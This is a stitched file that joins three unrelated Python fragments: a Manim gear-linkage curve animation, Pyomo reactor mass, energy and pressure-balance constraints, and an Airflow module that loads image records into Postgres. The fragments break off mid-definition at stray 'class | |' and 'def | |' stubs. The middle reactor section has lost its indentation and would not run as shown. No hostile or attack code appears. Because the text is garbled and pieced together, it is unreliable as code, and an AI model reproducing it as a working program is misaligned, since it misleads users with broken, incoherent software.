        dot_A = Dot(gear_3.center + complex_to_R3(P3A * np.exp(1j * phi_A)), color=PINK).scale(0.8)
        dot_B = Dot(gear_2.center + complex_to_R3(P2B * np.exp(1j * phi_B)), color=GREEN).scale(0.8)
        rect = Rectangle(height=0.4, width=11.5, stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
        hole = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(rect, LEFT).shift(RIGHT * 0.1)
        hole_2 = Dot().set_opacity(0).align_to(rect, RIGHT).shift(LEFT * 0.1)
        line_hole = Rectangle(height=0.18, width=10.5, stroke_width=2, stroke_color=YELLOW).align_to(rect, RIGHT).shift(LEFT * 0.11)
        rod = VGroup(rect, hole, line_hole, hole_2)
        gear_3.add(dot_A), gear_2.add(dot_B)
        # Second rod (pentagon shape) carrying the traced point D.
        poly_5 = Polygon([-0.2, 3., 0], [0.2, 3., 0], [0.2, 0, 0], [0, -0.2 * np.sqrt(3), 0], [-0.2, 0, 0],
                         stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
        hole_01 = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, DOWN).shift(UP * 0.1)
        line_hole_01 = Rectangle(height=2.5, width=0.18, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, UP).shift(DOWN * 0.11)
        dot_D = Dot(hole_01.get_center(), color=BLUE).scale(0.8)
        rod_2 = VGroup(poly_5, hole_01, line_hole_01, dot_D).rotate(PI)
        rod_2.shift(hole.get_center()-hole_01.get_center() + AC * RIGHT + CD * UP)
        c0 = Circle(radius=0.18, stroke_width=2, stroke_color=YELLOW).shift(hole.get_center()+AC*RIGHT)
        c1 = Dot(color=YELLOW).scale(0.85).shift(hole.get_center()+AC*RIGHT)
        rods = VGroup(rod, rod_2, VGroup(c0, c1))
        def update_rod(r):
            # Keep the rod pinned to A and aligned with the A->B direction.
            r.shift(dot_A.get_center() - hole.get_center())
            AB = dot_B.get_center() - dot_A.get_center()
            vect_old = hole_2.get_center() - hole.get_center()
            r.rotate(np.angle(complex(*AB[:2]))-np.angle(complex(*vect_old[:2])), about_point=hole.get_center())
        rods.add_updater(update_rod)
        gears = Gear_system(gear_0, gear_1, gear_2, gear_3)
        # gears.update_gears()
        path = TracedPath(dot_D.get_center, stroke_color=self.stroke_config['color'],
                          min_distance_to_new_point=0.02, stroke_width=self.stroke_config['width'])
        # Rotate the traced path with gear 1 so the curve is drawn in the
        # rotating frame of the gear train.
        path.add_updater(lambda p: p.rotate(gears.w.get_value() * gear_1.speed, about_point=gear_1.center))
        self.add(gears, rods, path)
        # Hide the mechanism; only the traced curve remains visible.
        gears.set_opacity(0)
        rods.set_opacity(0)
        self.wait(1)
        gears.w.set_value(self.gears_config['w'])
        self.wait(1/60)
        for i in range(self.step_num):
            for g in gears:
                g.rotate_gear(g.speed * gears.w.get_value())
            # Emit one frame per full revolution of gear 1; otherwise advance
            # the simulation without rendering (wait(0)).
            if i % int(PI * 2 / (gears.w.get_value() * gear_1.speed)) == 0:
                self.wait(1/self.camera.frame_rate)
                # self.wait(0)
            else:
                self.wait(0)
            print('step_%d' % i, end='\t')
            print('frame_%d' % int(abs(i / int(PI * 2 / (gears.w.get_value() * gear_1.speed)))))
        self.wait(self.wait_time)
class Curve_1(OnlyCurve):
    """OnlyCurve rendered with tweaked gear sizes/tooth counts, a slower
    angular speed (w/4) and proportionally more steps for a longer trace."""
    CONFIG = {
        'gears_config':{
            'r1': 3.2,  # larger central gear than the base scene
            'z': [36, 75, 37, 30],  # tooth counts of gears 0..3
            'l': [1, 1.2, 1, 3.6],  # linkage lengths P3A, P2B, CD, AC
            'a': [PI/6, 36 *DEGREES, PI/2],  # angles phi_A, phi_B, theta_BCD
            'w': 10/4,  # quarter speed of the base scene
        },
        'step_num': 3330 * 2 * 4,  # 4x steps to compensate the 1/4 speed
        'wait_time': 5,
    }
class Curve_1_02(OnlyCurve):
    """Curve_1 geometry uniformly scaled by 1.1 and run at full speed."""
    CONFIG = {
        'gears_config':{
            'r1': 3.2 * 1.1,  # scaled central gear radius
            'z': [36, 75, 37, 30],  # tooth counts of gears 0..3
            'l': np.array([0.9, 1., 1.2, 3.6]) * 1.1,  # scaled linkage lengths
            'a': [PI/6, 36 *DEGREES, PI/2],  # angles phi_A, phi_B, theta_BCD
            'w': 10,  # full speed
        },
        'step_num': 3330 * 2,
        'wait_time': 5,
    }
class | |
== (1 - self.Gas_M[1,'CH4',t]/self.Gas_M[0,'CH4',t])
#self.eq_c8 = Constraint(expr=self.X_gas ==
# (1 - self.Gas_M[1,'CH4']/self.Gas_M[0,'CH4']),
# doc = 'Conversion of gas fuel')
self.eq_c8 = Constraint(self.t, rule=rule_eq_c8,
doc = 'Conversion of gas fuel')
# ^ specifies X_gas from molar flow rates
def rule_eq_c18(b,z,t):
return b.CgT[z,t] == sum( b.Cg[z,j,t] for j in b.GasList )
self.eq_c18 = Constraint(self.z, self.t, rule=rule_eq_c18)
# if c18 is active, one of c3, c4, or c5 should be deactivated (probable c5)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Calculate the total and component SOLID mass flow rates
def rule_eq_c9(b,z,j,t):
return b.Solid_M[z,j,t] == b.A_bed*b.S_flux[z,j,t]
self.eq_c9 = Constraint(self.z,self.SolidList,self.t,rule=rule_eq_c9,
doc = 'Solid component mass flow rate')
# ^ specifies Solid_M from flux (differential)
def rule_eq_c10(b,z,t):
return b.Solid_M_total[z,t] == sum(b.Solid_M[z,j,t] \
for j in b.SolidList)
self.eq_c10 = Constraint(self.z, self.t, rule=rule_eq_c10,
doc = 'Total mass flow rate of solid')
# ^ specifies Solid_M_total
def rule_eq_c11(b,z,j,t):
return b.Solid_F[z,j,t]*(b.MW[j]*1e-3) == b.Solid_M[z,j,t]
self.eq_c11 = Constraint(self.z, self.SolidList, self.t, rule=rule_eq_c11,
doc = 'Solid component mole flow rate')
# specifies Solid_F from mass flow rate
def rule_eq_c12(b,z,t):
return b.Solid_F_total[z,t] == sum(b.Solid_F[z,j,t] \
for j in b.SolidList)
self.eq_c12 = Constraint(self.z, self.t, rule=rule_eq_c12,
doc = 'Total mole flow rate of solid')
# ^ specifies total molar flow rate
# Calculate the solid components loading
def rule_eq_c13(b,z,j,t):
return b.q[z,j,t]*(1e-3*b.vs[t]) == b.S_flux[z,j,t]
self.eq_c13 = Constraint(self.z, self.SolidList, self.t, rule=rule_eq_c13,
doc = 'Solid components loading')
# specifies q from vs & flux
# or, alternatively, specifies S_flux from q and vs (constant)
# Total solid loading [kg/m3]
def rule_eq_c14(b, z, t):
return b.qT[z,t] == sum(b.q[z,j,t] for j in b.SolidList)
self.eq_c14 = Constraint(self.z, self.t, rule=rule_eq_c14,
doc = 'Total solid loading')
# ^ specifies total solid loading
# Calculate the solid phase mass fractions
def rule_eq_c15(b, z, j, t):
return b.x[z,j,t]*b.qT[z,t] == b.q[z,j,t]
self.eq_c15 = Constraint(self.z, self.SolidList, self.t, rule=rule_eq_c15,
doc = 'Solid component mass fractions')
# ^ specifies x from densities
def rule_eq_c16(b,z,t):
return b.xtot[z,t] == sum(b.x[z,j,t] for j in b.SolidList)
self.eq_c16 = Constraint(self.z, self.t, rule=rule_eq_c16,
doc = 'Total mass fraction of solid')
# ^ specifies xtot
# is it not just 1? ... why is this not redundant...?
# exist components not in the solidlist?
def rule_eq_c17(b,t):
return b.X_OC[t] == 1 - self.Solid_M[0,'Fe2O3',t]/self.Solid_M[1,'Fe2O3',t]
#self.eq_c17 = Constraint(expr=self.X_OC ==
# 1 - self.Solid_M[0,'Fe2O3']/self.Solid_M[1,'Fe2O3'],
# doc = 'Oxygen carrier conversion')
self.eq_c17 = Constraint(self.t, rule=rule_eq_c17,
doc = 'Oxygen carrier conversion')
# ^ specifies X_OC
#==========================================================================
    def _energy_balance(self):
        """
        Add the energy balance constraints.

        Registers, over the axial (z) and time (t) index sets:
        eq_d1/eq_d2 gas-phase balance and enthalpy flux,
        eq_d3..eq_d5 gas-solid / gas-wall / refractory heat-transfer fluxes,
        eq_d6/eq_d7 solid-phase balance and heat-of-reaction flux,
        eq_d8..eq_d10 wall and ambient heat-transfer coupling,
        eq_d11 solid-phase enthalpy flux.
        NOTE(review): temperatures Ts appear scaled by 1e3 and several terms
        carry 1e-3 factors -- confirm the scaling convention used elsewhere
        in this model before editing any coefficient.
        """
        def rule_eq_d1(b, z, t):
            if z == b.z.first():
                return Constraint.Skip #The BC for Tg is under '_make_bdry_conds'
            else:
                return b.cont_param*b.eps*b.L*b.rho_vap[z,t]*b.cp_gas[z,t]*b.dTgdt[z,t] == \
                        - b.dGh_fluxdz[z,t] \
                        - b.Tg_GS[z,t]*b.L - b.Tg_GW[z,t]*b.L \
                        - b.Tg_refractory[z,t]*b.L
        self.eq_d1 = Constraint(self.z, self.t, rule=rule_eq_d1,
                                doc = 'Gas phase energy balance')
        # specifies dTgdt. 1e-6 is not a unit conversion...
        def rule_eq_d2(b, z, t):
            return b.Gh_flux[z,t] \
                    == b.rho_vap[z,t]*b.vg[z,t]*b.Tg[z,t]*b.cp_gas[z,t]
        self.eq_d2 = Constraint(self.z, self.t, rule=rule_eq_d2,
                                doc = 'Gas phase enthalpy flux')
        # specifies Gh_flux from Tg (differential)
        def rule_eq_d3(b, z, t):
            return b.Tg_GS[z,t]*b.dp == b.tuning_param2 \
                    *6*(1-b.eps)*b.hf[z,t]*(b.Tg[z,t]-1e3*b.Ts[z,t])
        self.eq_d3 = Constraint(self.z, self.t, rule=rule_eq_d3,
                                doc = 'Gas-solid convective heat transfer flux')
        # ^ specifies Tg_GS from gas/solid temps
        def rule_eq_d4(b, z, t):
            return b.Tg_GW[z,t]*b.Dr == b.hw[z,t]*(b.Tg[z,t] - b.Tw[z,t])*4
        self.eq_d4 = Constraint(self.z, self.t, rule=rule_eq_d4,
                                doc = 'Gas-wall heat transfer flux')
        # ^ specifies TgGW from gas/wall temps
        def rule_eq_d5(b, z, t):
            return b.Tg_refractory[z,t]*b.Dr == b.U[z,t]*(b.Tg[z,t] - b.Tw[z,t])*4
        self.eq_d5 = Constraint(self.z, self.t, rule=rule_eq_d5,
                                doc = 'Heat flux through refractory')
        # ^ specifies Tg_ref. from gas,wall temps...
        def rule_eq_d6(b, z, t):
            # shouldn't this be b.z.last()
            if z == b.z.first():
                return Constraint.Skip #The BC for Ts is under '_make_bdry_conds'
            else:
                return b.cont_param*(1-b.eps)*b.L*b.rho_sol*(b.cp_sol[z,t]*1e-3)*b.dTsdt[z,t] == \
                        b.dSh_fluxdz[z,t] \
                        + b.Tg_GS[z,t]*b.L \
                        + b.Ts_dHr[z,t]*b.L
        self.eq_d6 = Constraint(self.z, self.t, rule=rule_eq_d6,
                                doc = 'Solid phase energy balance')
        # ... 1e-3 factor is to convert cp_sol from J to kJ /kgK
        def rule_eq_d7(b, z, t):
            if z == b.z.first():
                return Constraint.Skip
            else:
                return b.Ts_dHr[z,t] == b.tuning_param \
                        *(1-b.eps)*b.rho_sol \
                        *(-1e3*b.DH_rxn_s[z,t]) \
                        *(1e-3*b.r_gen[z,1,t])
        self.eq_d7 = Constraint(self.z, self.t, rule=rule_eq_d7,
                                doc = 'Heat of reaction flux')
        # ^ specifies TS_dHr
        ########################
        def rule_eq_d8(b, z, t):
            return 0 == b.Tw_GW[z,t] - b.Tw_Wamb[z,t]
        self.eq_d8 = Constraint(self.z, self.t, rule=rule_eq_d8,
                                doc = 'Axial boundary condition for wall/ambient')
        def rule_eq_d9(b, z, t):
            return b.Tw_GW[z,t] == b.aw*b.hw[z,t]*(b.Tg[z,t]-b.Tw[z,t])
        self.eq_d9= Constraint(self.z, self.t, rule=rule_eq_d9,
                               doc = 'Heat transfer from gas to wall')
        def rule_eq_d10(b, z, t):
            return b.Tw_Wamb[z,t] == b.aw1*b.Uw[z,t]*(b.Tw[z,t]-b.Tamb)
            #/(b.rhow*b.Cpw)
        self.eq_d10 = Constraint(self.z, self.t, rule=rule_eq_d10,
                                 doc = 'Heat transfer from wall to ambient')
        ########################
        # ^ these three constraints specify Tw_Wamb, Tw_GW, and Tw from Tg
        def rule_eq_d11(b,z,t):
            return b.Sh_flux[z,t] == 1e-3*b.qT[z,t]*b.cp_sol[z,t]*(1e-3*b.vs[t])*(1e3*b.Ts[z,t])
        self.eq_d11 = Constraint(self.z, self.t, rule=rule_eq_d11,
                                 doc = 'Solid phase enthalpy flux')
#==========================================================================
    def _pressure_balance(self):
        """
        Add the pressure balance constraints, Ergun equation.

        Registers eq_e1 (ideal-gas pressure with an inlet boundary value),
        eq_e2 (pressure drop vs. superficial velocity, selectable between
        'Ergun' and 'SimplifiedP' via self.press_drop), eq_e3 (minimum
        fluidization velocity) and eq_e4 (velocity margin diagnostic).
        """
        # Ideal Gas Law
        def rule_eq_e1(b,z,t):
            if z == 0:
                return b.P[z,t] == b.Gas_In_P[t] #+ b.ErgunRHS
            else:
                return b.P[z,t] == b.CgT[z,t]*(b.R*1e-5)*b.Tg[z,t]
        self.eq_e1 = Constraint(self.z, self.t, rule=rule_eq_e1,
                                doc = 'Pressure calculation from ideal gas law')
        # ^ specify P from inlet and/or ideal law
        # Pressure drop to superficial velocity correlation
        def rule_eq_e2(b, z, t):
            if b.press_drop == 'Ergun': # Ergun equation
                if z == b.z.first():
                    return b.vg[z,t] == b.vg_in[t]  # Inlet velocity
                else:
                    return -b.dPdz[z,t]*1e5/150 == (((1e-3*b.mu_vap[z,t])
                                    *(1-b.eps)**2*(b.vg[z,t] + (1e-3*b.vs[t]))
                                    /(b.dp**2*b.eps**3))
                                + 1/150*(1.75*b.rho_vap[z,t]*(1-b.eps)
                                    *(b.vg[z,t] + (1e-3*b.vs[t]))*(b.vg[z,t] + (1e-3*b.vs[t]))
                                    /(b.dp*b.eps**3)))*b.L
                #################################################################
                ## make the assumption here that (vg+vs) > 0 to allow symbolic ##
                ## differentiation with simpy in the                           ##
                ## calculate_variable_from_constraint() function.              ##
                ## This should be regarded as temporary, as I may want to      ##
                ## simulate later a case with negative velocities.             ##
                ## DO NOT FORGET ABOUT THIS!!!                                 ##
                #################################################################
                ##
                ##
                ##
                ##
                ##
                ##
                ##
                ##
                #return -b.dPdz[z,t]*1e5 == ((150.0*b.mu_vap[z,t]
                #                *(1-b.eps)**2*(b.vg[z,t] + b.vs[t])
                #                /(b.dp**2*b.eps**3))
                #            + (1.75*b.rho_vap[z,t]*(1-b.eps)
                #                *abs(b.vg[z,t] + b.vs[t])*(b.vg[z,t] + b.vs[t])
                #                /(b.dp*b.eps**3)))*b.L
            elif b.press_drop == 'SimplifiedP': # Mondino et al. (2017)
                if z == b.z.first():
                    return b.vg[z,t] == b.vg_in[t]  # Inlet velocity
                else:
                    return -b.dPdz[z,t]*1e5 == (
                            (b.rho_sol - b.rho_vap[z,t])
                            *0.2*b.vg[z,t]*b.L)
            else:
                raise Exception('press_drop method not recognised.')
        self.eq_e2 = Constraint(self.z, self.t, rule=rule_eq_e2,
                                doc = 'Pressure drop to superfical gas \
                                       velocity correlation')
        # ^ specifies dPdz
        # Compute the minimum fluidized velocity
        def rule_e3(b,z,t):
            return ((1e-3*b.mu_vap[z,t])**2)*((1.75/(b.emf)**3)*(b.dp*b.umf[z,t]
                    *b.rho_vap[z,t]/(1e-3*b.mu_vap[z,t]))**2 \
                    + (150*(1-b.emf)/(b.emf)**3)*(b.dp \
                    *b.umf[z,t]*b.rho_vap[z,t]/(1e-3*b.mu_vap[z,t]))) == \
                    b.dp**3*b.rho_vap[z,t] \
                    *(b.rho_sol-b.rho_vap[z,t])*b.g
        self.eq_e3 = Constraint(self.z, self.t, rule=rule_e3,
                                doc = 'minimum fluidization velocity')
        # ^ specifies the minimum fluidized velocity
        # Store the difference between the minimum fluidization velocity and
        # gas velocity, to use as either post-solve check or in optimization
        def rule_eq_e4(b,z,t):
            return b.v_diff[z,t] == b.umf[z,t] - b.vg[z,t]
        self.eq_e4 = Constraint(self.z, self.t, rule=rule_eq_e4,
                                doc = 'Velocity post-check for moving \
                                       bed operating regime')
        # ^ specifies v_diff
#==========================================================================
def _make_bdry_conds(self):
"""
Boundary conditions for balance equations.
And inlet velocity of gas and solids.
"""
# all should be indexed by time
# BC for gas component mole balance
def rule_eq_f1(b,j,t):
return 1e2*b.G_flux[0,j,t]*b.A_bed \
== 1e2*b.Gas_In_F[t]*b.Gas_In_y[j,t]
self.eq_f1 = Constraint(self.GasList, self.t, rule=rule_eq_f1,
doc = 'Boundary condition for gas \
component mole balance')
# ^ specifies G_flux[0]
def rule_eq_f11(b,j,t):
return b.Gas_In_y[j,t] == b.y[0,j,t]
self.eq_f11 = Constraint(self.GasList, self.t, rule=rule_eq_f11,
doc = 'Direct specification of y at z=0')
# BC for solid components mass balance
def rule_eq_f2(b,j,t):
return 1e2*b.S_flux[1,j,t]*b.A_bed \
== 1e2*b.Solid_In_M[t]*b.Solid_In_x[j,t]
# Vbed = (1-eps)*Abed*L, but L=1 here because of scaling
self.eq_f2 = Constraint(self.SolidList, self.t, rule=rule_eq_f2,
doc = 'Boundary condition for solid \
component mass balance')
# ^ specifies S_flux[1]
# BC for gas phase energy balance
def | |
import logging
import json
from textwrap import dedent
from airflow.hooks.postgres_hook import PostgresHook
from util.loader import column_names as col
from util.loader import provider_details as prov
from psycopg2.errors import InvalidTextRepresentation
logger = logging.getLogger(__name__)
# Prefix for per-run intermediate loading tables (suffixed with an identifier).
LOAD_TABLE_NAME_STUB = 'provider_image_data'
# Final destination table for upserted records.
IMAGE_TABLE_NAME = 'image'
# Owner assigned to newly created loading tables.
DB_USER_NAME = 'deploy'
# SQL fragment: current timestamp.
NOW = 'NOW()'
# SQL fragment: boolean false literal.
FALSE = "'f'"
# Maximum data age per provider, as Postgres interval strings.
OLDEST_PER_PROVIDER = {
    prov.FLICKR_DEFAULT_PROVIDER: '6 months 18 days',
    prov.EUROPEANA_DEFAULT_PROVIDER: '3 months 9 days',
    prov.WIKIMEDIA_DEFAULT_PROVIDER: '6 months 18 days',
    prov.SMITHSONIAN_DEFAULT_PROVIDER: '8 days',
    prov.BROOKLYN_DEFAULT_PROVIDER: '1 month 3 days',
    prov.CLEVELAND_DEFAULT_PROVIDER: '1 month 3 days',
    prov.VICTORIA_DEFAULT_PROVIDER: '1 month 3 days',
    prov.NYPL_DEFAULT_PROVIDER: '1 month 3 days',
    prov.RAWPIXEL_DEFAULT_PROVIDER: '1 month 3 days',
    prov.SCIENCE_DEFAULT_PROVIDER: '1 month 3 days',
    prov.STATENS_DEFAULT_PROVIDER: '1 month 3 days'
}
def create_loading_table(
        postgres_conn_id,
        identifier
):
    """
    Create the intermediary loading table, set its owner, and add its indices.

    NOTE(review): the CREATE TABLE statement has no IF NOT EXISTS, so this
    fails if the table already exists; only the indices are created
    conditionally.
    """
    load_table = _get_load_table_name(identifier)
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    create_table = dedent(
        f'''
        CREATE TABLE public.{load_table} (
          {col.FOREIGN_ID} character varying(3000),
          {col.LANDING_URL} character varying(1000),
          {col.DIRECT_URL} character varying(3000),
          {col.THUMBNAIL} character varying(3000),
          {col.WIDTH} integer,
          {col.HEIGHT} integer,
          {col.FILESIZE} integer,
          {col.LICENSE} character varying(50),
          {col.LICENSE_VERSION} character varying(25),
          {col.CREATOR} character varying(2000),
          {col.CREATOR_URL} character varying(2000),
          {col.TITLE} character varying(5000),
          {col.META_DATA} jsonb,
          {col.TAGS} jsonb,
          {col.WATERMARKED} boolean,
          {col.PROVIDER} character varying(80),
          {col.SOURCE} character varying(80),
          {col.INGESTION_TYPE} character varying(80)
        );
        '''
    )
    set_owner = f'ALTER TABLE public.{load_table} OWNER TO {DB_USER_NAME};'
    index_statements = [
        dedent(
            f'''
            CREATE INDEX IF NOT EXISTS {load_table}_{col.PROVIDER}_key
            ON public.{load_table} USING btree ({col.PROVIDER});
            '''
        ),
        dedent(
            f'''
            CREATE INDEX IF NOT EXISTS {load_table}_{col.FOREIGN_ID}_key
            ON public.{load_table}
            USING btree (provider, md5(({col.FOREIGN_ID})::text));
            '''
        ),
        dedent(
            f'''
            CREATE INDEX IF NOT EXISTS {load_table}_{col.DIRECT_URL}_key
            ON public.{load_table}
            USING btree (provider, md5(({col.DIRECT_URL})::text));
            '''
        ),
    ]
    # Run in the same order as before: table, owner, then the three indices.
    for statement in [create_table, set_owner, *index_statements]:
        postgres.run(statement)
def load_local_data_to_intermediate_table(
        postgres_conn_id,
        tsv_file_name,
        identifier,
        max_rows_to_skip=10
):
    """
    Bulk-load a local TSV file into the intermediate table, deleting up to
    max_rows_to_skip malformed rows from the file between retries, then
    clean the loaded data.

    Raises InvalidTextRepresentation when the retry budget is exhausted.
    """
    load_table = _get_load_table_name(identifier)
    logger.info(f'Loading {tsv_file_name} into {load_table}')
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    # One initial attempt plus one retry per skippable row.
    attempts_left = max_rows_to_skip + 1
    loaded = False
    while attempts_left > 0 and not loaded:
        attempts_left -= 1
        try:
            postgres.bulk_load(f'{load_table}', tsv_file_name)
            loaded = True
        except InvalidTextRepresentation as e:
            # Drop the offending line from the file and try again.
            bad_line = _get_malformed_row_in_file(str(e))
            _delete_malformed_row_in_file(tsv_file_name, bad_line)
    if not loaded:
        raise InvalidTextRepresentation(
            'Exceeded the maximum number of allowed defective rows')
    _clean_intermediate_table_data(postgres, load_table)
def load_s3_data_to_intermediate_table(
        postgres_conn_id,
        bucket,
        s3_key,
        identifier
):
    """
    Import a TSV object from S3 into the intermediate table via the
    aws_s3 Postgres extension, then clean the loaded data.
    """
    load_table = _get_load_table_name(identifier)
    logger.info(f'Loading {s3_key} from S3 Bucket {bucket} into {load_table}')
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    # NOTE(review): region is hard-coded to us-east-1 -- confirm this matches
    # the deployment's bucket region.
    import_statement = dedent(
        f"""
        SELECT aws_s3.table_import_from_s3(
          '{load_table}',
          '',
          'DELIMITER E''\t''',
          '{bucket}',
          '{s3_key}',
          'us-east-1'
        );
        """
    )
    postgres.run(import_statement)
    _clean_intermediate_table_data(postgres, load_table)
def _clean_intermediate_table_data(
        postgres_hook,
        load_table
):
    """Remove unusable rows from the loading table.

    Deletes rows missing any required column, then removes duplicate
    (provider, foreign_id) rows, keeping the row with the largest ctid.
    """
    required_columns = (
        col.DIRECT_URL,
        col.LICENSE,
        col.LANDING_URL,
        col.FOREIGN_ID,
    )
    for required_column in required_columns:
        postgres_hook.run(
            f'DELETE FROM {load_table} WHERE {required_column} IS NULL;'
        )
    postgres_hook.run(
        dedent(
            f'''
            DELETE FROM {load_table} p1
            USING {load_table} p2
            WHERE
              p1.ctid < p2.ctid
              AND p1.{col.PROVIDER} = p2.{col.PROVIDER}
              AND p1.{col.FOREIGN_ID} = p2.{col.FOREIGN_ID};
            '''
        )
    )
def upsert_records_to_image_table(
        postgres_conn_id,
        identifier,
        image_table=IMAGE_TABLE_NAME
):
    """
    Upsert rows from the intermediate loading table into ``image_table``.

    On a (provider, md5(foreign_id)) conflict, the existing row is updated:
    scalar columns prefer the newest non-null value, while the jsonb
    columns (meta_data, tags) are merged.
    """
    def _newest_non_null(column):
        # SQL fragment: take the incoming value unless it is NULL.
        return f'{column} = COALESCE(EXCLUDED.{column}, old.{column})'

    def _merge_jsonb_objects(column):
        """
        This function returns SQL that merges the top-level keys of a
        JSONB column, taking the newest available non-null value.
        """
        return f'''{column} = COALESCE(
          jsonb_strip_nulls(old.{column})
            || jsonb_strip_nulls(EXCLUDED.{column}),
          EXCLUDED.{column},
          old.{column}
        )'''

    def _merge_jsonb_arrays(column):
        # SQL fragment: deduplicated union of both arrays, with fallbacks
        # when either side is NULL.
        return f'''{column} = COALESCE(
          (
            SELECT jsonb_agg(DISTINCT x)
            FROM jsonb_array_elements(old.{column} || EXCLUDED.{column}) t(x)
          ),
          EXCLUDED.{column},
          old.{column}
        )'''

    load_table = _get_load_table_name(identifier)
    logger.info(f'Upserting new records into {image_table}.')
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    # Destination column -> SQL expression selected from the loading table.
    # NOW / FALSE are module-level SQL-literal constants defined elsewhere
    # in this file — presumably 'NOW()' and 'false'; confirm at their
    # definitions.
    column_inserts = {
        col.CREATED_ON: NOW,
        col.UPDATED_ON: NOW,
        col.INGESTION_TYPE: col.INGESTION_TYPE,
        col.PROVIDER: col.PROVIDER,
        col.SOURCE: col.SOURCE,
        col.FOREIGN_ID: col.FOREIGN_ID,
        col.LANDING_URL: col.LANDING_URL,
        col.DIRECT_URL: col.DIRECT_URL,
        col.THUMBNAIL: col.THUMBNAIL,
        col.WIDTH: col.WIDTH,
        col.HEIGHT: col.HEIGHT,
        col.FILESIZE: col.FILESIZE,
        col.LICENSE: col.LICENSE,
        col.LICENSE_VERSION: col.LICENSE_VERSION,
        col.CREATOR: col.CREATOR,
        col.CREATOR_URL: col.CREATOR_URL,
        col.TITLE: col.TITLE,
        col.LAST_SYNCED: NOW,
        col.REMOVED: FALSE,
        col.META_DATA: col.META_DATA,
        col.TAGS: col.TAGS,
        col.WATERMARKED: col.WATERMARKED
    }
    upsert_query = dedent(
        f'''
        INSERT INTO {image_table} AS old ({', '.join(column_inserts.keys())})
        SELECT {', '.join(column_inserts.values())}
        FROM {load_table}
        ON CONFLICT ({col.PROVIDER}, md5({col.FOREIGN_ID}))
        DO UPDATE SET
          {col.UPDATED_ON} = {NOW},
          {col.LAST_SYNCED} = {NOW},
          {col.REMOVED} = {FALSE},
          {_newest_non_null(col.INGESTION_TYPE)},
          {_newest_non_null(col.SOURCE)},
          {_newest_non_null(col.LANDING_URL)},
          {_newest_non_null(col.DIRECT_URL)},
          {_newest_non_null(col.THUMBNAIL)},
          {_newest_non_null(col.WIDTH)},
          {_newest_non_null(col.HEIGHT)},
          {_newest_non_null(col.FILESIZE)},
          {_newest_non_null(col.LICENSE)},
          {_newest_non_null(col.LICENSE_VERSION)},
          {_newest_non_null(col.CREATOR)},
          {_newest_non_null(col.CREATOR_URL)},
          {_newest_non_null(col.TITLE)},
          {_newest_non_null(col.WATERMARKED)},
          {_merge_jsonb_objects(col.META_DATA)},
          {_merge_jsonb_arrays(col.TAGS)}
        '''
    )
    postgres.run(upsert_query)
def overwrite_records_in_image_table(
        postgres_conn_id,
        identifier,
        image_table=IMAGE_TABLE_NAME
):
    """Overwrite image-table columns with the loading table's values for
    every matching (provider, md5(foreign_id)) row."""
    load_table = _get_load_table_name(identifier)
    logger.info(f'Updating records in {image_table}.')
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)

    columns_to_update = (
        col.LANDING_URL,
        col.DIRECT_URL,
        col.THUMBNAIL,
        col.WIDTH,
        col.HEIGHT,
        col.FILESIZE,
        col.LICENSE,
        col.LICENSE_VERSION,
        col.CREATOR,
        col.CREATOR_URL,
        col.TITLE,
        col.META_DATA,
        col.TAGS,
        col.WATERMARKED,
    )
    update_set_string = ',\n'.join(
        f'{column} = {load_table}.{column}' for column in columns_to_update
    )

    update_query = dedent(
        f'''
        UPDATE {image_table}
        SET
        {update_set_string}
        FROM {load_table}
        WHERE
          {image_table}.{col.PROVIDER} = {load_table}.{col.PROVIDER}
          AND
          md5({image_table}.{col.FOREIGN_ID})
            = md5({load_table}.{col.FOREIGN_ID});
        '''
    )
    postgres.run(update_query)
def drop_load_table(postgres_conn_id, identifier):
    """Drop the intermediate loading table for the given run identifier."""
    table_name = _get_load_table_name(identifier)
    hook = PostgresHook(postgres_conn_id=postgres_conn_id)
    hook.run(f'DROP TABLE {table_name};')
def _get_load_table_name(
        identifier,
        load_table_name_stub=LOAD_TABLE_NAME_STUB,
):
    """Return the intermediate loading table name for this run."""
    return '{}{}'.format(load_table_name_stub, identifier)
def _get_malformed_row_in_file(error_msg):
error_list = error_msg.splitlines()
copy_error = next(
(line for line in error_list if line.startswith('COPY')), None
)
assert copy_error is not None
line_number = int(copy_error.split('line ')[1].split(',')[0])
return line_number
def _delete_malformed_row_in_file(tsv_file_name, line_number):
with open(tsv_file_name, "r") as read_obj:
lines = read_obj.readlines()
with open(tsv_file_name, "w") as write_obj:
for index, line in enumerate(lines):
if index + 1 != line_number:
write_obj.write(line)
def _create_temp_flickr_sub_prov_table(
        postgres_conn_id,
        temp_table='temp_flickr_sub_prov_table'
):
    """
    (Re)create and populate a temporary table that maps Flickr creator URLs
    to sub-provider names, and return the table's name.

    The original function used bare triple-quoted strings as section
    comments (the first one even sat in docstring position, documenting
    only the DROP step); they are real comments now.
    """
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    # Drop the temporary table if it already exists.
    postgres.run(f'DROP TABLE IF EXISTS public.{temp_table};')
    # Create intermediary table for sub provider migration.
    postgres.run(
        dedent(
            f'''
            CREATE TABLE public.{temp_table} (
              {col.CREATOR_URL} character varying(2000),
              sub_provider character varying(80)
            );
            '''
        )
    )
    postgres.run(
        f'ALTER TABLE public.{temp_table} OWNER TO {DB_USER_NAME};'
    )
    # Populate the intermediary table with the sub providers of interest.
    for sub_prov, user_id_set in prov.FLICKR_SUB_PROVIDERS.items():
        for user_id in user_id_set:
            creator_url = prov.FLICKR_PHOTO_URL_BASE + user_id
            # NOTE(review): values are interpolated directly into the SQL.
            # They come from our own configuration, but parameterized
            # queries would be safer.
            postgres.run(
                dedent(
                    f'''
                    INSERT INTO public.{temp_table} (
                      {col.CREATOR_URL},
                      sub_provider
                    )
                    VALUES (
                      '{creator_url}',
                      '{sub_prov}'
                    );
                    '''
                )
            )
    return temp_table
def update_flickr_sub_providers(
        postgres_conn_id,
        image_table=IMAGE_TABLE_NAME,
        default_provider=prov.FLICKR_DEFAULT_PROVIDER,
):
    """
